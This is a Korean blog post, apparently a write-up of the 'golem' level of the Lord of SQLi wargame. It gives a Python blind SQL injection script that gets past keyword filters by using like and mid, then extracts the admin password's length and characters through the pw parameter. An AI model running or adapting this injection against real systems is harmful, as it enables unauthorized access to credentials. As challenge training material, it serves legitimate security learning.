문제에 들어가면 이렇게 뜰겁니다 많이 길어보이는데 걱정할것없습니다 별거아닙니다
필터링하는게 꾀많네요 or and substr등을 필터링하는걸 보니 우회해야겠네요
이건 블라인드 sql 인젝션을 써야합니다 일단 파이썬으로 코드를 짜봅시다
import string
import requests
my_cookies=dict(PHPSESSID="") #쿠키 값
idLength=0
url="https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='||"
abc=string.digits + string.ascii_letters
print("Start Blind attack")
result=""
#pw 길이 알아내기
while(1):
idLength +=1
param="length(pw) like "+str(idLength)+"%23" #=과 같은 역할을 하는 like
new_url=url+param
res=requests.get(new_url,cookies=my_cookies)
if res.text.find("Hello admin") > 0:
break
print("password length is: "+str(idLength))
#패스워드 알아내기
print("Start finding password...")
for i in range(1,idLength+1):
for a in abc:
param="ASCII(mid(pw,"+str(i)+",1)) like "+str(ord(a))+"%23" #substr과 같은 역할을 하는 mid
new_url=url+param
res=requests.get(new_url,cookies=my_cookies)
if res.text.find("Hello admin") > 0:
print(str(i)+"번째 char is :" + a)
result += a
break
print("result:"+result)이렇게 해주시면 풀리는것을 볼수있습니다
실행은 각자해보시길 바랍니다..^^
phpsessid에는 각자 따로 놓으셔야하는데요
f12 > application > value쪽을 보시면 각자다르게 뜹니다 그 코드를 복사하셔서 phpsessid에 붙여넣으시면됩니다
'los 문제' 카테고리의 다른 글
| los #10번 skeleton 문제풀이 (0) | 2022.08.28 |
|---|---|
| los 9 #vampire 풀이 (1) | 2022.08.18 |
| los #8 troll 문제풀이 (1) | 2022.07.31 |
| los #7 orge 풀이 (0) | 2022.07.31 |
| LOS 6번 문제 풀이 (0) | 2021.09.13 |